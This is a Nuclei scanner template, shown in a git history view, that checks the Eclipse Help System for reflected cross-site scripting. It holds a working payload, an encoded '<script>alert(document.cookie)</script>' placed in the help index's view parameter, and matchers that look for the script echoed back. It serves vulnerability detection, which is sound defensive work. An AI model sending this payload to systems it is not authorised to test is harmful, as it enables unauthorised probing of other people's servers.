nuclei-templates/vulnerabilities/eclipse-help-system-xss.yaml

23 lines
553 B
YAML
Raw Normal View History

2020-08-30 05:05:28 +00:00
id: eclipse-help-system-xss
info:
name: Eclipse Help System RXSS vulnerability
author: pikpikcu
severity: medium
2020-08-30 05:08:28 +00:00
# Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml
2020-08-30 05:05:28 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
2020-08-30 05:05:28 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(document.cookie)</script>"
part: body